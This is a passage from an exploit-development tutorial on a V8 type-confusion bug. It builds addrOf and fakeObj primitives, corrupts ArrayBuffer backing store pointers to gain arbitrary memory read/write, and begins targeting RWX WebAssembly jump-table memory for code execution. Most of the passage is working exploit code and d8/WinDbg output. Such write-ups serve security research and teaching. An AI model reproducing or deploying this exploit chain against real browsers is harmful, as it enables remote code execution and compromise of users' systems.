From here, there is just one slight modification that needs to be made for our addrOf function. We have to make sure we subtract 1n from the BigUint64Array to account for pointer tagging if we want to use this address further in the script.

Our addrOf function with its conversion buffers will now look like so:

// Conversion Buffers
let floatView = new Float64Array(1);
let uint64View = new BigUint64Array(floatView.buffer);

Number.prototype.toBigInt = function toBigInt() {
    floatView[0] = this;
    return uint64View[0];
};

...

function addrOf() {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      // Trigger our type-confusion by accessing an out-of-bound property
        // This will load p1 from our object thinking it's a Double, but instead
        // due to overlap, it will load p2 which is an Object
      return obj.p${p1}.x;
    }
  `);

    let obj = {z: 1234};
    let pValues = [];
    pValues[p1] = {x: 13.37};
    pValues[p2] = {y: obj};

    for (let i = 0; i < 10000; i++) {
        let res = vuln(makeObj(pValues));
        if (res != 13.37) {
            // Subtract 1n from address due to pointer tagging.
            return res.toBigInt() - 1n;
        }
    }
    throw "[!] AddrOf Primitive Failed"
}

The fakeObj Write Primitive

The fakeObj primitive, short for β€œFake Object”, allows us to write data to essentially a fake object by exploiting our constructed type confusion. In essence, the write primitive is just the inverse of our addrOf primitive.

To create the fakeObj function, we simply make a small modification to the original addrOf function. In our fakeObj function, we store the original value of our object in a variable called orig. After we overwrite it, we return the original value and compare it in the JIT function.

For testing, we try to overwrite the x property of p1 with the 0x41414141n double. Due to the type confusion, this will overwrite the y property of our object in p2 when the bug triggers in the JIT code. If we successfully corrupt the value and later return it via the orig parameter, it should no longer equal 13.37.

The fakeObj function will look like so:

function fakeObj() {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      let orig = obj.p${p1}.x;
      // Overwrite property x of p1, but due to type confusion
      // we overwrite property y of p2
      obj.p${p1}.x = 0x41414141n;
      return orig;
    }
  `);

    let obj = {z: 1234};
    let pValues = [];
    pValues[p1] = {x: 13.37};
    pValues[p2] = {y: obj};

    for (let i = 0; i < 10000; i++) {
        let res = vuln(makeObj(pValues));
        if (res != 13.37) {
            return res;
        }
    }
}

After updating our code with the new fakeObj primitive, and executing it within d8, we should get output similar to the following:

C:\dev\v8\v8\out\x64.debug>d8 --allow-natives-syntax C:\Users\User\Desktop\poc.js
[+] Finding Overlapping Properties...
[+] Properties p6 and p30 overlap!
[+] Leaking Object Address...
[+] Object Address: 0x21eacf99a08
[+] Corrupting Object Address...
[+] Leaked Data: 1094795585

It seems that we got some data back, and it doesn’t equal 13.37!

This looks to be an unsigned integer, so we can use the uint64View array buffer to store the value and then convert the bytes to hex, like so.

d8> uint64View[0] = 1094795585n
d8> uint64View[0].toString(16)
'41414141'

And there we have it! We successfully overwrote the y property of p2 and successfully constructed a valid write primitive!

This is a very powerful primitive as it allows us to write to essentially any object property that we can find the address of. From here we can start to build out more complex exploit primitives to eventually achieve code execution.

Gaining Memory Read + Write

Now that we have created working read and write primitives from our bug, we can start to utilize these primitives to gain remote code execution within the interpreter. Currently we’ve only been able to overwrite the property of a second object with a controlled double. However, this isn’t useful for us by any means.

Reason being is that even though we can overwrite an object address within a property, if we attempt to access that address to write data, V8 will still attempt to dereference it and access the backing store pointer at offset 8 from that address. This makes it difficult for us to read or write to any address of our choosing.

To achieve something useful with our read and write primitives, we need to overwrite an internal field of an object, such as the backing store pointer, rather than an actual object or property within the backing store. As you know, the backing store pointer stores a memory address that tells V8 where our property or element array is located. If we can overwrite this pointer, we can tell V8 to access specific elements anywhere in memory via our bug!

The next thing we have to consider for this exploit is to decide on what type of object we want to use when corrupting the backing store pointer. Sure, we can use a simple object with out-of-line properties, but in our case, and for most browser exploits, we’ll actually utilize an ArrayBuffer object.

The reason we use an ArrayBuffer over a normal object is because these array buffers are used to represent a fixed-length raw binary data buffer. One important thing to note is that we cannot directly manipulate the contents of an ArrayBuffer in JavaScript. Instead, we must use a TypedArray or a DataView object with a specific data representation format, and use that to read and write the contents of the buffer.

We’ve previously used a TypedArray in our addrOf primitive to return our object’s address as a double floating point and then converted it to an unsigned 64-bit integer, which allowed us to then convert that value to hex to see the actual address. We can apply the same principle here for our fakeObj primitive by specifying the type of data we want to work with, i.e. integers, floats, 64-bit integers, etc. This way we can easily read and write data of whatever type we want, without worrying too much about conversions or the type of values our properties are.

Before we move on any further, let’s take a look at how ArrayBuffer objects looks like in memory so we can better understand how to exploit them.

To start, let’s create a new ArrayBuffer that will be 8 bytes in length and then assign that buffer an 8-bit unsigned view.

d8> var buffer = new ArrayBuffer(8)
d8> var view = new Uint8Array(buffer)

Now, let’s use our %DebugPrint command to examine our buffer object.

d8> %DebugPrint(buffer)
DebugPrint: 000002297C70D881: [JSArrayBuffer]
 - map: 0x03b586384371 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x032f41990b21 <Object map = 000003B5863843C1>
 - elements: 0x01d0a7902cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - embedder fields: 2
 - backing_store: 00000286692101A0
 - byte_length: 8
 - neuterable
 - properties: 0x01d0a7902cf1 <FixedArray[0]> {}
 - embedder fields = {
    0000000000000000
    0000000000000000
 }

As you can see, an ArrayBuffer object is similar to other V8 objects, as it has a Map, a properties, and an elements fixed array, as well as the necessary properties for the array buffer itself, such as the byte length and its backing store. The backing store is the address where the TypedArray (in this case, the view variable) will read and write data to/from.

We can confirm the connection between the ArrayBuffer and the TypedArray by using the %DebugPrint function on the view variable.

d8> %DebugPrint(view)
DebugPrint: 000002297C70F791: [JSTypedArray]
 - map: 0x03b586382b11 <Map(UINT8_ELEMENTS)> [FastProperties]
 - prototype: 0x032f419879e1 <Object map = 000003B586382B61>
 - elements: 0x02297c70f7d9 <FixedUint8Array[8]> [UINT8_ELEMENTS]
 - embedder fields: 2
 - buffer: 0x02297c70d881 <ArrayBuffer map = 000003B586384371>
 - byte_offset: 0
 - byte_length: 8
 - length: 8
 - properties: 0x01d0a7902cf1 <FixedArray[0]> {}
 - elements: 0x02297c70f7d9 <FixedUint8Array[8]> {
         0-7: 0
 }
 - embedder fields = {
    0000000000000000
    0000000000000000
 }

As you can see, the TypedArray has a buffer property that points to our ArrayBuffer at address 0x02297c70d881. The TypedArray also inherits the byte length property from the parent ArrayBuffer so it knows how much data it can read and write with its specific data format.

To better understand the structure and backing store of the array buffer object, we can use WinDbg to inspect it.

0:005> dq 000002297C70D881-1 L6
00000229`7c70d880  000003b5`86384371 000001d0`a7902cf1
00000229`7c70d890  000001d0`a7902cf1 00000000`00000008
00000229`7c70d8a0  00000286`692101a0 00000000`00000002

Upon inspection, we can see that from the top left we have our Map, properties and elements array property store pointers, followed by the byte length, and finally the backing store pointer of address 00000286692101A0, which is at offset 32 from the start of the array buffer.

Before we look into the backing store buffer, let’s add some data to our buffer to better see the representation in memory. To write data to the ArrayBuffer we have to use our TypedArray via our view variable like so.

d8> view[0] = 65
d8> view[2] = 66

Now that’s done, let’s view this backing store in WinDbg. Take note that I do not subtract 1 from the pointer since unlike other object backing stores, an ArrayBuffer backing store is actually a 64-bit pointer!

0:005> dq 00000286692101A0 L6
00000286`692101a0  00000000`00420041 dddddddd`fdfdfdfd
00000286`692101b0  00000000`dddddddd 8c003200`1f678a43
00000286`692101c0  00000286`69d34e50 00000286`69d40230

Upon inspection of this memory address, we notice that in the top left we have our 8 bytes of data that we allocated for our array buffer. From the right, in index 0 we have 0x41 which is 65 and in index 2 we have 0x42 which is 66.

As you can see, using a ArrayBuffer with a TypedArray of any data type allows us to control where we can read and write data as long as we can control the backing store pointer!

With that in mind, let’s figure out how we can access this backing store pointer via our fakeObj primitive in order to overwrite it. Currently for both the read and write primitive we create an object for p1 with one in-line property, and an object for p2 which also has one in-line property.

function fakeObj() {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      let orig = obj.p${p1}.x;
      // Overwrite property x of p1, but due to type confusion
      // we overwrite property y of p2
      obj.p${p1}.x = 0x41414141n;
      return orig;
    }
  `);

    let obj = {z: 1234};
    let pValues = [];
    pValues[p1] = {x: 13.37};
    pValues[p2] = {y: obj}
	...

In the vuln function we attempt to overwrite property x for our p1 object. This would dereference the object address for p1 and access offset 24, where our x property value is stored in-line. However, due to the type confusion, this operation will actually dereference the object address of p2 and access offset 24, where the y property value is stored in-line, which would allow us to overwrite the address of the obj object.

The example below is provided to help you visualize how this would look like in memory.

We know that the backing store pointer for our array buffer is at offset 32, meaning that if we create another in-line property such as x2, then we should be able to access and overwrite that backing store pointer via our fakeObj primitive!

An example is provided below to help visualize this process in memory.

This is great for us because it allows us to finally utilize our bug and our primitives to gain arbitrary memory read/write access. Although, there is one slight problem. Consider this. If we have to write or read from multiple memory locations, we’ll have to constantly trigger our bug and overwrite our array buffers backing store via the fakeObj primitive, which is tedious. As such, we need a better solution.

To minimize the number of times we have to use the fakeObj primitive to overwrite the backing store, we can use two array buffers objects instead of one! This way, we can corrupt the backing store pointer of our first array buffer and point it to our second array buffer object’s address.

Once that is completed, we can use a TypedArray view of our first array buffer to write to the 5th object property (4th index, i.e. view1[4]), which will overwrite the backing store pointer of the second array buffer. From there, we can use a TypedArray view of the second array buffer to read and write data to/from the pointed memory region!

By using these two array buffers together, we can create another exploit primitive that allows us to quickly read and write data of any type to any location within the V8 heap.

An example of how this would look like in memory can be seen below.

To make our fakeObj function more flexible, we will modify it to accept an object of our choice. We’ll also pass in a newValue parameter that specifies the data we want to write. We’ll then set that newValue parameter for the x property within the vuln function instead of having our hardcoded address of 0x41414141n.

function fakeObj(obj, newValue) {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      let orig = obj.p${p1}.x;
      obj.p${p1}.x = $(newValue);
      return orig;
    }
  `);

    let pValues = [];
    pValues[p1] = {x: 13.37};
    pValues[p2] = {y: obj};
	...

We will also modify the object within p1 to have two in-line properties, since we know that the second in-line property overlaps the backing store pointer. Additionally, we need to modify the vuln function to access the second inline property so we can write to the backing store pointer.

BigInt.prototype.toNumber = function toNumber() {
    uint64View[0] = this;
    return floatView[0];
};

function fakeObj(obj, newValue) {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      // Write to Backing Store Pointer via Property x2
      let orig = obj.p${p1}.x2;
      obj.p${p1}.x2 = ${newValue};
      return orig;
    }
  `);

    let pValues = [];
    // x2 Property Overlaps Backing Store Pointer for Array Buffer
    let o = {x1: 13.37, x2: 13.38};
    pValues[p1] = o;
    pValues[p2] = obj;
	...

Notice that for our overlapping p2 object, we set it directly to the passed in obj. The reason we do this is because we need to access offset 32 of that specific object, instead of passing the object in as a property.

To properly convert the address or data we are passing in, we will add a new conversion function called toNumber and call that against our newValue parameter. This function is necessary as we need to convert the address or data that we are passing in, to be that of a float. The reason for this is due to our constructed type confusion and the fact that p1 expects a float!

BigInt.prototype.toNumber = function toNumber() {
    uint64View[0] = this;
    return floatView[0];
};

function fakeObj(obj, newValue) {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      // Write to Backing Store Pointer via Property x2
      let orig = obj.p${p1}.x2;
      obj.p${p1}.x2 = ${newValue.toNumber()};
      return orig;
    }
  `);

    let pValues = [];
    // x2 Property Overlaps Backing Store Pointer for Array Buffer
    let o = {x1: 13.37, x2: 13.38};
    pValues[p1] = o;
    pValues[p2] = obj;
	...
}

Now comes the important part, modifying our JIT loop to trigger the bug and overwrite our backing store pointer. Similar to our previous fakeObj loop there are only a few modifications we need to make.

First of all, take note from above that we set the p1 property to a newly created object called o with two in-line properties. The reason we are doing this is because during our JIT loop we will need to constantly set the 2nd in-line property attribute of o to force the JIT compiler to trigger a redundancy elimination on our Map. This will allow us to access the backing store pointer as a float. If we don’t do this, then the function will not work!

Second of all, within the JIT loop, we will no longer compare the result value to 13.37. Instead, we will compare it to the value of our second property. In this case, if the loop no longer returns 13.38, it means that we successfully triggered the bug and overwrote the backing store pointer!

The final version of the fakeObj primitive will look like so.

BigInt.prototype.toNumber = function toNumber() {
    uint64View[0] = this;
    return floatView[0];
};

function fakeObj(obj, newValue) {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      // Write to Backing Store Pointer via Property x2
      let orig = obj.p${p1}.x2;
      obj.p${p1}.x2 = ${newValue.toNumber()};
      return orig;
    }
  `);

    let pValues = [];
    // x2 Property Overlaps Backing Store Pointer for Array Buffer
    let o = {x1: 13.37,x2: 13.38};
    pValues[p1] = o;
    pValues[p2] = obj;

    for (let i = 0; i < 10000; i++) {
        // Force Map Check and Redundency Elimination
        o.x2 = 13.38;
        let res = vuln(makeObj(pValues));
        if (res != 13.38) {
            return res.toBigInt();
        }
    }
    throw "[!] fakeObj Primitive Failed"
}

Now that we finished that, since we’ll be using an object with two in-line properties for our fakeObj primitive, let’s make the same modification for our addrOf primitive to stay consistent, like so.

function addrOf(obj) {
    eval(`
    function vuln(obj) {
      obj.inline;
      this.Object.create(obj);
      // Trigger our type-confusion by accessing an out-of-bound property
        // This will load p1 from our object thinking it's a Double, but instead
        // due to overlap, it will load p2 which is an Object
      return obj.p${p1}.x2;
    }
  `);

    let pValues = [];
    // x2 Property Overlaps Backing Store Pointer for Array Buffer
    pValues[p1] = {x1: 13.37,x2: 13.38};
    pValues[p2] = {y: obj};

    for (let i = 0; i < 10000; i++) {
        let res = vuln(makeObj(pValues));
        if (res != 13.37) {
            // Subtract 1n from address due to pointer tagging.
            return res.toBigInt() - 1n;
        }
    }
    throw "[!] AddrOf Primitive Failed"
}

Now that we have modified our exploit script, we should be able to overwrite an array buffer backing store pointer. Let’s test this!

To start, we’ll modify our exploit code by creating a new array buffer with 1024 bytes of data. Afterwards, we’ll attempt to leak the address of our array buffer and overwrite the backing store pointer with 0x41414141.

Take note that that I have added two %DebugPrint functions to validate that the addresses we are leaking do coincide with out actual array buffer object, and that we have successfully overwritten the array buffer’s backing store pointer.

The updated code at the end of the script should look similar to mines.

print("[+] Finding Overlapping Properties...");
findOverlappingProperties();
print(`[+] Properties p${p1} and p${p2} overlap!`);

// Create Array Buffer
let arrBuf1 = new ArrayBuffer(1024);

print("[+] Leaking ArrayBuffer Address...");
let arrBuf1fAddr = addrOf(arrBuf1);
print(`[+] ArrayBuffer Address: 0x${arrBuf1fAddr.toString(16)}`);
%DebugPrint(arrBuf1)

print("[+] Corrupting ArrayBuffer Backing Store Address...")
// Overwrite Backign Store Pointer with 0x41414141
let ret = fakeObj(arrBuf1, 0x41414141n);
print(`[+] Original Leaked Data: 0x${ret.toString(16)}`);
%DebugPrint(arrBuf1)

Upon executing our updated exploit script within d8, we get the following output.

C:\dev\v8\v8\out\x64.debug>d8 --allow-natives-syntax C:\Users\User\Desktop\poc.js
[+] Finding Overlapping Properties...
[+] Properties p15 and p11 overlap!
[+] Leaking ArrayBuffer Address...
[+] ArrayBuffer Address: 0x2a164919360
DebugPrint: 000002A164919361: [JSArrayBuffer] in OldSpace
 - map: 0x00f4b4a84371 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x0143f1990b21 <Object map = 000000F4B4A843C1>
 - elements: 0x029264b02cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - embedder fields: 2
 - backing_store: 000001AEDA203210
 - byte_length: 1024
 - neuterable
 - properties: 0x029264b02cf1 <FixedArray[0]> {}
 - embedder fields = {
    0000000000000000
    0000000000000000
 }
...

[+] Corrupting ArrayBuffer Backing Store Address...
[+] Original Leaked Data: 0x1aeda203210
DebugPrint: 000002A164919361: [JSArrayBuffer] in OldSpace
 - map: 0x00f4b4a84371 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x0143f1990b21 <Object map = 000000F4B4A843C1>
 - elements: 0x029264b02cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - embedder fields: 2
 - backing_store: 0000000041414141
 - byte_length: 1024
 - neuterable
 - properties: 0x029264b02cf1 <FixedArray[0]> {}
 - embedder fields = {
    0000000000000000
    0000000000000000
 }
...

As you can see, our exploit script now successfully leaks the address of the array buffer, and we can confirm that the addresses match within the debug output. We also see that the original leaked data, or ret, returns the original backing store address. Additionally, we see that we have successfully overwritten the backing store pointer with 0x41414141, as shown in the debug output!

With the ability to overwrite the backing store pointer, we can go ahead and continue writing our exploit by building out our memory read/write primitive via the two array buffers. To recap, we need to create two array buffers, leak the address of the second array buffer, and overwrite the backing store pointer of the first array buffer with the address of the second array buffer.

The code to do accomplish this can be seen below.

print("[+] Finding Overlapping Properties...");
findOverlappingProperties();
print(`[+] Properties p${p1} and p${p2} overlap!`);

// Create Array Buffers
let arrBuf1 = new ArrayBuffer(1024);
let arrBuf2 = new ArrayBuffer(1024);

// Leak Address of arrBuf2
print("[+] Leaking ArrayBuffer Address...");
let arrBuf2fAddr = addrOf(arrBuf2);
print(`[+] ArrayBuffer Address: 0x${arrBuf2fAddr.toString(16)}`);

// Corrupt Backing Store Pointer of arrBuf1 with Address to arrBuf2
print("[+] Corrupting ArrayBuffer Backing Store Address...")
let originalArrBuf1BackingStore = fakeObj(arrBuf1, arrBuf2fAddr);

With this, we should be able to overwrite the backing store pointer of arrBuf1 to point to the arrBuf2 object. To do so, we can create a TypedArray for our first array buffer and read the backing store pointer using a 64-bit unsigned integer via the BigUint64Array. This should provide us with the byte representation of the address of the second array buffer.

The updated code for that will look like so.

print("[+] Finding Overlapping Properties...");
findOverlappingProperties();
print(`[+] Properties p${p1} and p${p2} overlap!`);

// Create Array Buffers
let arrBuf1 = new ArrayBuffer(1024);
let arrBuf2 = new ArrayBuffer(1024);

// Leak Address of arrBuf2
print("[+] Leaking ArrayBuffer Address...");
let arrBuf2Addr = addrOf(arrBuf2);
print(`[+] ArrayBuffer Address: 0x${arrBuf2Addr.toString(16)}`);

// Corrupt Backing Store Pointer of arrBuf1 with Address to arrBuf2
print("[+] Corrupting ArrayBuffer Backing Store Address...")
let originalArrBuf1BackingStore = fakeObj(arrBuf1, arrBuf2Addr);

// Validate Overwrite of Backing Store via TypedArray
let view1 = new BigUint64Array(arrBuf1)
let originalArrBuf2BackingStore = view1[4]
print(`[+] ArrayBuffer Backing Store: 0x${originalArrBuf2BackingStore.toString(16)}`);
%DebugPrint(arrBuf2)

As you can see, at the end of the script to validate the overwrite, we use %DebugPrint on our arrBuf2 object to confirm that we have the correct backing store address.

Executing our code, we get the following output.

C:\dev\v8\v8\out\x64.debug>d8 --allow-natives-syntax C:\Users\User\Desktop\poc.js
[+] Finding Overlapping Properties...
[+] Properties p6 and p15 overlap!
[+] Leaking ArrayBuffer Address...
[+] ArrayBuffer Address: 0x7393e19360
[+] Corrupting ArrayBuffer Backing Store Address...
[+] ArrayBuffer Backing Store: 0x15b14db9f20
DebugPrint: 0000007393E19361: [JSArrayBuffer] in OldSpace
 - map: 0x00f8c4384371 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x0075a6d10b21 <Object map = 000000F8C43843C1>
 - elements: 0x00f30a102cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - embedder fields: 2
 - backing_store: 0000015B14DB9F20
 - byte_length: 1024
 - neuterable
 - properties: 0x00f30a102cf1 <FixedArray[0]> {}
 - embedder fields = {
    0000000000000000
    0000000000000000
 }

And it works! As you can see in the output, we have successfully leaked the address of the second array buffer and read its backing store pointer, which all match. From here, we can continue building out our memory read and write primitives via our array buffers.

Since all address in within V8 are 32-bit, we’ll use the 64-bit unsigned integer typed array. An example of a read and write primitive built from the example above code can be seen below.

let memory = {
	read64(addr) {
		view1[4] = addr;
		let view2 = new BigUint64Array(arrBuf2);
		return view2[0];
	},
	write64(addr, ptr) {
		view1[4] = addr;
		let view2 = new BigUint64Array(arrBuf2);
		view2[0] = ptr;
	}
};

To test if this works, let’s try using the write64 memory primitive to write the value 0x41414141n to the second array buffer’s backing store. The code for that would look like this:

print("[+] Finding Overlapping Properties...");
findOverlappingProperties();
print(`[+] Properties p${p1} and p${p2} overlap!`);

// Create Array Buffers
let arrBuf1 = new ArrayBuffer(1024);
let arrBuf2 = new ArrayBuffer(1024);

// Leak Address of arrBuf2
print("[+] Leaking ArrayBuffer Address...");
let arrBuf2Addr = addrOf(arrBuf2);
print(`[+] ArrayBuffer Address: 0x${arrBuf2Addr.toString(16)}`);

// Corrupt Backing Store Pointer of arrBuf1 with Address to arrBuf2
print("[+] Corrupting ArrayBuffer Backing Store Address...")
let originalArrBuf1BackingStore = fakeObj(arrBuf1, arrBuf2Addr);

// Store Original Backing Store Pointer of arrBuf2
let view1 = new BigUint64Array(arrBuf1)
let originalArrBuf2BackingStore = view1[4]

// Construct our Memory Read and Write Primitive
let memory = {
	read64(addr) {
		view1[4] = addr;
		let view2 = new BigUint64Array(arrBuf2);
		return view2[0];
	},
	write64(addr, ptr) {
		view1[4] = addr;
		let view2 = new BigUint64Array(arrBuf2);
		view2[0] = ptr;
	}
};
print("[+] Constructed Memory Read and Write Primitive!");

// Write Data to Second Array Buffer
memory.write64(originalArrBuf2BackingStore, 0x41414141n);
%DebugPrint(arrBuf2);

Next, we can use WinDbg again to debug this by setting a breakpoint on RUNTIME_FUNCTION(Runtime_DebugPrint) and then executing the script. Once we hit the breakpoint, type g or press Go, and then press Shift + F11 or β€œStep Over” to see the debug output in the console.

[+] Finding Overlapping Properties...
[+] Properties p15 and p22 overlap!
[+] Leaking ArrayBuffer Address...
[+] ArrayBuffer Address: 0x39532f0db50
[+] Corrupting ArrayBuffer Backing Store Address...
[+] Constructed Memory Read and Write Primitive!
DebugPrint: 0000039532F0DB51: [JSArrayBuffer] in OldSpace
 - map: 0x03a3a6384371 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x02ac8fd10b21 <Object map = 000003A3A63843C1>
 - elements: 0x009c20b82cf1 <FixedArray[0]> [HOLEY_ELEMENTS]
 - embedder fields: 2
 - backing_store: 000002791B474430
 - byte_length: 1024
 - neuterable
 - properties: 0x009c20b82cf1 <FixedArray[0]> {}
 - embedder fields = {
    0000000000000000
    0000000000000000
 }

As you can see, the backing store pointer is at the address 0x000002791B474430. Using WinDbg, let’s view that address and confirm that we did in fact write to that buffer.

0:000> dq 000002791B474430 L6
00000279`1b474430  00000000`41414141 00000000`00000000
00000279`1b474440  00000000`00000000 00000000`00000000
00000279`1b474450  00000000`00000000 00000000`00000000

And there we have it! We have successfully built a memory read/write primitive and can now write data to any location in the V8 heap. With this in place, we can move on to the next step of the exploit, which is gaining remote code execution!

Gaining Code Execution

With our memory primitives in place, we need to find a way to have V8 execute our code. Unfortunately, we cannot simply write or inject shellcode into random V8 heap regions or into our array buffer because NX in enabled.

This can be verified by using the vprot WinDbg function on the array buffer’s backing store pointer.

0:000> !vprot 000002791B474430
BaseAddress:       000002791b474000
AllocationBase:    000002791b390000
AllocationProtect: 00000004  PAGE_READWRITE
RegionSize:        000000000001b000
State:             00001000  MEM_COMMIT
Protect:           00000004  PAGE_READWRITE
Type:              00020000  MEM_PRIVATE

As you can see, we only have read and write access to these memory pages, but no execution permissions.

Since we cannot execute our code in these memory pages, we need to find a different solution.

One potential solution is to target JIT memory pages. JIT compilation of JavaScript code requires the compiler to write instructions into a memory page that can later be executed. Since this happens in line with code execution, these pages typically have RWX permissions. This would be a good target for our memory read/write primitives, where we can attempt to leak a pointer from a JIT compiled JavaScript function, write our shellcode to that address, and then call the function to execute our own code

However, in early 2018 the V8 team introduced a protection called write_protect_code_memory which flips JavaScript’s JIT’s memory page permissions between read/execute and read/write. As a result, these pages are marked as read/execute during JavaScript execution, preventing us from writing malicious code into them.

One way to bypass this protection is to use Return Oriented Programming (ROP). With ROP, we can either exploit vtables (which store the addresses of virtual functions), JIT function pointers, or even corrupt the stack.

Examples of how ROP gadgets can be used to exploit vtables can be found in the blog post β€œOne Day Short of a Full Chain: Part 3 - Chrome Renderer RCE” and in Connor McGarr’s β€œBrowser Exploitation on Windows” post.

While ROP is an effective technique for exploit development, I like to live by the β€œWork Smart Not Hard” motto and not have to do a lot of work. Fortunately for us, JavaScript isn’t the only language in V8 that gets compiled, there’s WebAssembly too!

Basic WebAssembly Internals

WebAssembly (also known as wasm) is a low-level programming language that is designed for in-browser client-side execution, and it is often used to support C/C++ and similar languages.

One of the benefits of WebAssembly is that it allows for communication between WebAssembly modules and the JavaScript context. This enables WebAssembly modules to access browser functionality through the same Web APIs that are available to JavaScript.

Initially, the V8 engine does not compile WebAssembly. Instead, wasm functions get compiled via the baseline compiler known asΒ Liftoff. Liftoff iterates over the WebAssembly code once and immediately emits machine code for each WebAssembly instruction, similar to how SparkPlug emits Ignitions bytecode into machine code.

Since wasm is also JIT compiled, its memory pages are marked with Read-Write-Execute permissions. There is an associated write-protect-flag for wasm, but it is disabled by default because of the asm.js file as explained by Johnathan Norman. This makes wasm a valuable tool for our exploit development efforts.

Before we can use WebAssembly in our exploitation efforts, we first need to understand a little bit about its structure and how it works. Unfortunately, I won’t be covering everything about WebAssembly because that in of itself can be a separate blog post. As such, I will only cover the important parts we need to know.

In WebAssembly, a compiled piece of code is known as a β€œmodule”. These modules are then instantiated to produce an executable object called an β€œinstance”. An instance is an object that contain all of theΒ exported WebAssembly functionsΒ which allow calling into WebAssembly code from JavaScript.

In the V8 engine, these objects are known as the WasmModuleObject and WasmInstanceObject respectively and can be found within the v8/src/wasm/wasm-objects.h source file.

WebAssembly is a binary instruction format, and its module is similar to a Portable Executable (PE) file. Like a PE file, a WebAssembly module also contains sections. There are about 11 standard sections in a WebAssembly module:

  1. Type
  2. Import
  3. Function
  4. Table
  5. Memory
  6. Global
  7. Export
  8. Start
  9. Element
  10. Code
  11. Data

For a more detailed explanation of each section, I suggest reading the β€œIntroduction to WebAssembly” article.

What I want to focus on is the table section. In WebAssembly, tables are a mechanism for mapping values that can’t be represented or directly accessed by WebAssembly, such as GC references, raw OS handles, or native pointers. Additionally, each table has an element type that specifies the kind of data it holds.

In WebAssembly, each instance has one designated β€œdefault” table that is indexed by the call_indirect operation. This operation is an instruction that performs a call to a function within the default table.

In 2018, the V8 development team updated WebAssembly to use jump tables for all calls, in order to implement lazy compilation and more efficient tier-ups. As a result, all WebAssembly function calls within V8 call to a slot in that jump table, which then jumps to the actual compiled code (or the WasmCompileLazy stub).

Within V8, the jump table (also known as the code table) serves as the central dispatch point for all (direct and indirect) invocations in WebAssembly. The jump table holds one slot per function in a module, with each slot containing a dispatch to the currently published WasmCode corresponding to the associated function. More information on the jump table implementation can be found in the /src/wasm/jump-table-assembler.h source file.

When WebAssembly code is generated, the compiler makes it available to the system by entering it into the code table and patching the jump table for a particular instance. It then returns a raw pointer to the WasmCode object. Because this code is JIT compiled, the pointer points to a section of memory with RWX permissions. Every time the corresponding function to the WasmCode is called, V8 jumps to that address and executes the compiled code.

This RWX memory section pointed to by the jump table is what we want to target with our memory read/write primitives to achieve remote code execution!

Abusing WebAssembly Memory

Now that we have a better understanding of WebAssembly and know that we need to target the jump table pointer for remote code execution, let’s write some wasm code and explore how it looks in memory so we can better understand how to use it for our exploit.

One easy way to write wasm code is to use WasmFiddle, which will allow us to write C code and get the outputs of the code buffer and JavaScript code needed to run it. Using the default code to return 42, we get the following JavaScript code.

var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule);
var func = wasmInstance.exports.main;

After executing this code in d8, we can use %DebugPrint against our wasmInstance variable, which will be the executable module object that houses our function exports. As you can see, in the last line of the wasm code we are setting the func variable to target the main export of that wasm instance, which will point to our executable wasmCode.

Doing so, we get the following output.

d8> %DebugPrint(wasmInstance)
DebugPrint: 0000032B465226A9: [WasmInstanceObject] in OldSpace
 - map: 0x02d1cc30ae51 <Map(HOLEY_ELEMENTS)>
 - module_object: 0x0135bd78e159 <Module map = 000002D1CC30A8B1>
 - exports_object: 0x0135bd78e341 <Object map = 000002D1CC30C3E1>
 - native_context: 0x032b465039f9 <NativeContext[248]>
 - memory_object: 0x032b465227a9 <Memory map = 000002D1CC30B851>
 - imported_function_instances: 0x00bca7c82cf1 <FixedArray[0]>
 - imported_function_callables: 0x00bca7c82cf1 <FixedArray[0]>
 - managed_native_allocations: 0x0135bd78e2d1 <Foreign>
 - memory_start: 00000273516A0000
 - memory_size: 65536
 - memory_mask: ffff
 - imported_function_targets: 00000272D08C73D0
 - globals_start: 0000000000000000
 - imported_mutable_globals: 00000272D08C7410
 - indirect_function_table_size: 0
 - indirect_function_table_sig_ids: 0000000000000000
 - indirect_function_table_targets: 0000000000000000
...

After analyzing the output, we can see that there is no reference to a code or jump table. However, if we look into V8’s code for WasmInstanceObject, we will see that there is an accessor to a jump_table_start entry for our function. This entry should point to a RWX memory region where the machine code is stored.

In V8, there is an offset to this jump_table_start entry, but it changes regularly between versions of V8. Therefore, we need to manually locate where this address is stored within the WasmInstanceObject.

To assist us in finding where this address is stored within the WasmInstanceObject, we can use the !address command within WinDbg to display information about the memory used by the d8 process. Since we know that the jump_table_start address has RWX permissions, we can filter the address output by the PAGE_EXECUTE_READWRITE protection constant to look for any newly created RWX memory regions.

Doing so results in the following output.

0:004> !address -f:PAGE_EXECUTE_READWRITE

        BaseAddress      EndAddress+1        RegionSize     Type       State                 Protect             Usage
--------------------------------------------------------------------------------------------------------------------------
      55`6c400000       55`6c410000        0`00010000 MEM_PRIVATE MEM_COMMIT  PAGE_EXECUTE_READWRITE             <unknown>  [I....lU...A....D]

